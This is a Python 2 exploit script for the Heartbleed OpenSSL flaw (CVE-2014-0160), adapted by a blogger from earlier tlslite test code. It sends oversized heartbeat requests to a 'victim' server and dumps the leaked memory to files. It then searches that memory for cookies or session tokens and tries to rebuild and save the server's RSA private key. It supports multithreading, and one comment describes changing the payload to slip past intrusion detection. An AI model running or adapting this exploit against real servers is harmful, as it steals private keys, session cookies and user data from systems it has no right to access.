#!/usr/bin/env python2
'''
CVE-2014-0160 - Heartbleed OpenSSL Heartbeat vulnerability
This code is adapted from the work of Mothran (https://github.com/mothran/tlslite).
He released test code for the Heartbleed vulnerability at https://github.com/mothran/tlslite/blob/master/scripts/heartbleed.py.
To run this code, you need to install tlslite from that GitHub repository; use only that edition, as other versions will not work.
You also need to install python-m2crypto, python-pycryptopp and python-gmpy.
Modified by : Samiux
Blog : http://samiux.blogspot.com
http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160_17.html
Date : April 20, 2014
Version : 0.8
Change log : 0.1 - First release (April 16, 2014)
0.2 - Threading added, Minor improvement and bug fixes (April 16, 2014)
0.3 - Minor bug fixes (April 17, 2014)
0.4 - Fix calculation of private key bug, Minor improvement (April 17, 2014)
0.5 - Fix private key calculation bug, Minor improvement (April 18, 2014)
0.6 - Minor improvement (April 18, 2014)
0.7 - Bug fix and more improvement (April 18, 2014)
0.8 - Add read dump file offline (April 20, 2014)
Known issues : - The script is for online testing and slow speed is expected. However, this minimizes the load on the victim
server.
- If the number of threads is too high, the victim server will refuse the connection. The limitation is not the power
of your attacking machine; it is a limitation of the victim server. In general, if the number
of threads is higher than 40, the victim server will refuse the connection.
- If the script quits unexpectedly (with error messages) on the first try against an unknown server, the server may not support
SSL or may not be vulnerable to this bug.
Unknown factor : Since I have had no time to test the private key recovery function (that is, I could not capture the private key in my personal lab),
I am not sure whether it works. I would appreciate it if anyone could inform me of the result. I can be reached
at http://www.infosec-ninjas.com/contact.
Apache with a vulnerable OpenSSL may not leak the SSL private key. However, Cloudflare (Nginx with OpenSSL) will.
Personal Lab : Victim - Ubuntu Server 12.04.4 LTS x86 (without (auto) update/upgrade), LAMP on VirtualBox with 96MB RAM in the VM
Attacker - Kali Linux 1.0.6 x86_64 on MacBook Air (Mid 2013) dual boot
I followed this guide (https://www.digitalocean.com/community/articles/how-to-create-a-ssl-certificate-on-apache-for-ubuntu-12-04)
to set up the SSL key on Apache.
'''
# standard library
import socket, sys, time, re
import os.path
# threading library
import threading
# base64 and gmpy library
import base64, gmpy
# pyasn1 library
from pyasn1.codec.der import encoder
from pyasn1.type.univ import *
# optparse library
from optparse import OptionParser
# tlslite library
from tlslite.api import *
from tlslite.messages import *
from tlslite import __version__
# Menu and options
# Command-line interface: one positional argument (the target server) plus
# the option flags below. Parsing happens at import time and the results are
# published as module-level names read by read_offline() and main_loop().
options = OptionParser(
    usage='time python %prog server [options]',
    description='Test for OpenSSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-d', '--dump', type='int', default=1, help='Number of dump per request, standard is 16K per dump (default: 1)')
options.add_option('-k', '--key', action='store_true', default=False, help="Attempt to obtain the server's SSL Private key")
options.add_option('-r', '--request', type='int', default=1, help='Number of requests (default: 1)')
options.add_option('-c', '--cookie', type='str', default='', help="Cookie or session to look for (default: NULL, e.g. -c 'Cookie:')")
options.add_option('-w', '--write', action='store_true', default=False, help='Write data to be dumped to file (default: False) (write to ~/dumpwrite.bin)')
options.add_option('-a', '--append', action='store_true', default=False, help='Append data to be dumped to file (default: False) (append to ~/dumpappend.bin)')
options.add_option('-n', '--name', type='str', default="", help='Server name extension, e.g. -n "/page/index.php" (default: NULL)')
options.add_option('-t', '--thread', type='int', default=1, help='Number of threads for the requests (default: 1, best range 1-40)')
options.add_option('-q', '--quiet', action='store_true', default=False, help='Do not display the output on screen (default: False)')
options.add_option('-o', '--offline', action='store_true', default=False, help='Read the dump file offline (default: False)')
opts, args = options.parse_args()
# The server is taken from the parsed positional arguments rather than from
# sys.argv[1], so it is found even when option flags precede it on the
# command line (e.g. "-p 8443 example.org").
if len(args) < 1 or len(args[0]) == 0:
    options.print_help()
    sys.exit()
# for server and port
port = opts.port
address = (args[0], int(port))
# args assignment
servername = opts.name
numb = opts.dump
num_loop = opts.request
num_thread = opts.thread
find_priv_key = opts.key
find_base = opts.write
find_append = opts.append
cookie_val = opts.cookie
# Cookie search is enabled only when a non-empty pattern was supplied.
find_cookie = opts.cookie != ""
def _offline_select_dump():
    """Return the name of the dump file to analyse; exit(-1) if none exists.

    When both dump files are present the appended dump is used, which is
    what the original (previously unreachable) third branch selected.
    """
    if os.path.exists("dumpappend.bin"):
        return "dumpappend.bin"
    if os.path.exists("dumpwrite.bin"):
        return "dumpwrite.bin"
    print("Dump file not exists, quit!")
    sys.exit(-1)


def _offline_save_cookies(infile):
    """Append every line fragment matching ``cookie_val`` to dumpsave.txt."""
    print("Processing .....")
    print("Result will be saved to ~/dumpsave.txt")
    with open(infile, "rb") as dump, open("dumpsave.txt", "a") as out:
        chunk = dump.read(16384)
        while chunk:
            # cookie_val is used as a regular expression, as before.
            for match in re.finditer(cookie_val, chunk):
                start = match.start()
                # Search from ``start`` so ``stop`` is an absolute index;
                # the old code sliced with an offset relative to ``start``.
                stop = chunk.find("\n", start)
                if stop == -1:
                    # No newline left in this chunk: keep the remainder.
                    stop = len(chunk)
                out.write(chunk[start:stop] + "\n")
            chunk = dump.read(16384)


def _offline_fetch_public_key():
    """Handshake with ``address`` and return the server certificate's public key."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(5)
    sock.connect(address)
    connection = TLSConnection(sock)
    settings = HandshakeSettings()
    settings.heart_beat = True
    try:
        connection.handshakeClientCert(None, None, settings=settings, serverName=servername)
    except TLSLocalAlert as a:
        if a.description != AlertDescription.user_canceled:
            raise
        print(str(a))
        sys.exit(-1)
    except TLSRemoteAlert as a:
        # The handshake carries no username/password, so the PSK-identity
        # and bad-MAC alerts are simply re-raised. The old code tested an
        # undefined ``username`` here and died with a NameError instead.
        if a.description != AlertDescription.handshake_failure:
            raise
        print("Unable to negotiate mutually acceptable parameters")
        sys.exit(-1)
    if not connection.session.serverCertChain:
        print("We don't have a public key to factor, bailing.")
        sys.exit(-1)
    pubkey = connection.session.serverCertChain.x509List[0].publicKey
    if not opts.quiet:
        print("n = %s, e = %s" % (pubkey.n, pubkey.e))
        print("pubkey_bits = %i" % numBits(pubkey.n))
        print("Public key obtained.")
    connection.close()
    return pubkey


def _offline_write_private_key(n, e, p):
    """Derive the RSA private key from factor ``p``; print it and save it as PEM."""
    q = n // p
    phi = (p - 1) * (q - 1)
    d = gmpy.invert(e, phi)
    dp = d % (p - 1)
    dq = d % (q - 1)
    qinv = gmpy.invert(q, p)
    seq = Sequence()
    # build SSL private key
    for value in [0, n, e, d, p, q, dp, dq, qinv]:
        seq.setComponentByPosition(len(seq), Integer(value))
    priv_key = ("\n\n-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n\n" % base64.encodestring(encoder.encode(seq)))
    # print the private key to screen
    print(priv_key)
    # save the private key
    with open("private_key.pem", "w") as key_file:
        key_file.write(priv_key)


# read the dump file offline
def read_offline():
    """Analyse a previously saved dump file instead of sending new requests.

    Driven by the module-level option flags:

    * ``find_cookie`` (-c): matches of the regular expression ``cookie_val``
      are appended, up to the end of their line, to ``dumpsave.txt``.
    * ``find_priv_key`` (-k): the server's public key is obtained through a
      TLS handshake with ``address`` and each 16384-byte chunk of the dump
      is scanned for a value that divides the modulus. On a hit the private
      key is printed, written to ``private_key.pem`` and the function
      returns; otherwise "Private key not found :(" is printed.

    The dump is read from ``dumpappend.bin`` or ``dumpwrite.bin`` in the
    current directory. The process exits with status -1 when neither file
    exists, when the handshake is rejected, or when the server presents no
    certificate chain.
    """
    # option -c (--cookie)
    if find_cookie:
        _offline_save_cookies(_offline_select_dump())
    # option -k (--key)
    if find_priv_key:
        pubkey = _offline_fetch_public_key()
        n = pubkey.n
        e = pubkey.e
        prime_len_bytes = (numBits(n) + 15) // 16
        infile = _offline_select_dump()
        print("Processing .....")
        # Round up so a trailing partial chunk is included in the total.
        total_chunks = (os.path.getsize(infile) + 16383) // 16384
        with open(infile, "rb") as dump:
            chunk = bytearray(dump.read(16384))
            counter = 1
            while chunk:
                print("Processing %d of %d (trunk of 16384 bytes) ..." % (counter, total_chunks))
                for i in range(0, len(chunk) - prime_len_bytes):
                    # reverse the bytes, only works for little-endian
                    # targets (FIXME? Probably not worth it, would have
                    # to guess word length on big-endian.)
                    candidate = bytesToNumber(chunk[i + prime_len_bytes:i:-1])
                    if candidate > 1 and (n % candidate) == 0:
                        print("Success! p = %i, q = %i" % (candidate, n // candidate))
                        _offline_write_private_key(n, e, candidate)
                        # Stop here: the old code rebound the dump handle
                        # to the key file and then kept reading from it.
                        return
                chunk = bytearray(dump.read(16384))
                counter = counter + 1
        print("Private key not found :(")
# Main loop
def main_loop(z):
    """Run ``num_loop`` heartbeat test requests against ``address``.

    Each iteration opens a fresh TCP connection, performs a TLS handshake
    with the heartbeat setting enabled, sends ``numb`` heartbeat messages
    (declared payload length 0xffff, payload "AA") and collects what
    ``connection.readPOC`` returns. The collected data is then handled
    according to the module-level option flags: written to
    ``dumpwrite.bin`` (-w), appended to ``dumpappend.bin`` (-a), scanned
    for a factor of the server's RSA modulus (-k), searched for
    ``cookie_val`` (-c), or printed.

    Args:
        z: label of the calling thread, used only in progress messages.

    The function calls ``sys.exit`` when the handshake is rejected, when
    -k is set and the server presents no certificate chain, when the
    ``/tmp/key_found`` flag file already exists, or after a private key
    has been recovered and saved.
    """
    for request_no in range(0, num_loop):
        # check for key found flag
        if os.path.exists("/tmp/key_found"):
            print("Private key has been found, no more process!")
            # No connection is open at this point (the previous iteration
            # closed its own), so there is nothing to close here; the old
            # code referenced ``connection`` before it was assigned.
            sys.exit(0)
        if num_thread > 1:
            print("Thread : %i of %i, Request : %i of %i" % (z, num_thread, request_no, num_loop))
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect(address)
        connection = TLSConnection(sock)
        settings = HandshakeSettings()
        settings.heart_beat = True
        try:
            connection.handshakeClientCert(None, None, settings=settings, serverName=servername)
        except TLSLocalAlert as a:
            if a.description != AlertDescription.user_canceled:
                raise
            print(str(a))
            sys.exit(-1)
        except TLSRemoteAlert as a:
            # The handshake carries no username/password, so the
            # PSK-identity and bad-MAC alerts are simply re-raised. The old
            # code tested an undefined ``username`` and hit a NameError.
            if a.description != AlertDescription.handshake_failure:
                raise
            print("Unable to negotiate mutually acceptable parameters")
            sys.exit(-1)
        # --key (-k) is true
        if find_priv_key:
            if not connection.session.serverCertChain:
                print("We don't have a public key to factor, bailing.")
                sys.exit(-1)
            pubkey = connection.session.serverCertChain.x509List[0].publicKey
            if not opts.quiet:
                print("n = %s, e = %s" % (pubkey.n, pubkey.e))
            n = pubkey.n
            e = pubkey.e
            num_pubkey_bits = numBits(n)
            if not opts.quiet:
                print("pubkey_bits = %i" % num_pubkey_bits)
            prime_len_bytes = (num_pubkey_bits + 15) // 16
            if not opts.quiet:
                print("Public key obtained.")
        # change the value of payload to prevent the IDS/IPS
        heartbeat = HeartBeat()
        heartbeat.create(type=1,
                         pay_len=0xffff,
                         payload="AA")
        # up the range numbs to get more memory, sometimes it repeats.
        resp = ""
        for _ in range(0, numb):
            for result in connection._sendMsg(heartbeat):
                pass
            resp = resp + connection.readPOC(0xffff)
        # option -w (--write)
        if find_base:
            with open("dumpwrite.bin", "wb") as dump_file:
                dump_file.write(resp)
        # option -a (--append)
        if find_append:
            with open("dumpappend.bin", "ab") as dump_file:
                dump_file.write(resp)
        # option -k (--key) <--- this feature is not well tested, please let me know the result.
        if find_priv_key:
            # Scan a separate bytearray copy so ``resp`` keeps its original
            # type for the cookie search and the final print below.
            buf = bytearray(resp)
            for i in range(0, len(buf) - prime_len_bytes):
                # reverse the bytes, only works for little-endian
                # targets (FIXME? Probably not worth it, would have
                # to guess word length on big-endian.)
                candidate = bytesToNumber(buf[i + prime_len_bytes:i:-1])
                if candidate > 1 and (n % candidate) == 0:
                    print("Success! Thread = %i, p = %i, q = %i" % (z, candidate, n // candidate))
                    # save the dump
                    with open("dumpfinal.bin", "wb") as dump_file:
                        dump_file.write(buf)
                    # calculation
                    p = candidate
                    q = n // candidate
                    phi = (p - 1) * (q - 1)
                    d = gmpy.invert(e, phi)
                    dp = d % (p - 1)
                    dq = d % (q - 1)
                    qinv = gmpy.invert(q, p)
                    seq = Sequence()
                    # build SSL private key
                    for value in [0, n, e, d, p, q, dp, dq, qinv]:
                        seq.setComponentByPosition(len(seq), Integer(value))
                    priv_key = ("\n\n-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n\n" % base64.encodestring(encoder.encode(seq)))
                    # print the private key to screen
                    print(priv_key)
                    # save the private key
                    with open("private_key.pem", "w") as key_file:
                        key_file.write(priv_key)
                    # set the key found flag
                    with open("/tmp/key_found", "w") as flag_file:
                        flag_file.write("Private key is found!")
                    connection.close()
                    sys.exit(0)
        # option -c (--cookie)
        if find_cookie:
            # cookie_val is used as a regular expression, as before.
            for match in re.finditer(cookie_val, resp):
                start = match.start()
                # Search from ``start`` so ``stop`` is an absolute index;
                # the old code sliced with an offset relative to ``start``.
                stop = resp.find("\n", start)
                if stop == -1:
                    # No newline after the match: print the remainder.
                    stop = len(resp)
                print(resp[start:stop])
        # to print the dump on screen or not
        if not (opts.quiet or opts.write or opts.append or opts.key or find_cookie):
            print(resp)
        # pause for 0.1 seconds in order to reduce the chance of duplicating the content of the memory dump
        if opts.request > 1:
            time.sleep(.1)
        # close the connection
        connection.close()
# Script entry point: clear any stale "key found" flag, then run either the
# offline dump analysis or the online test (threaded when -t is above 1).
if __name__ == "__main__":
    # reset the key found flag
    if os.path.exists("/tmp/key_found"):
        os.remove("/tmp/key_found")
    if opts.offline:
        read_offline()
    elif num_thread > 1:
        # multi-threading: create every worker first, start them all,
        # then wait for each one to finish
        workers = [
            threading.Thread(target=main_loop, args=(index,))
            for index in range(num_thread)
        ]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()
    else:
        main_loop(1)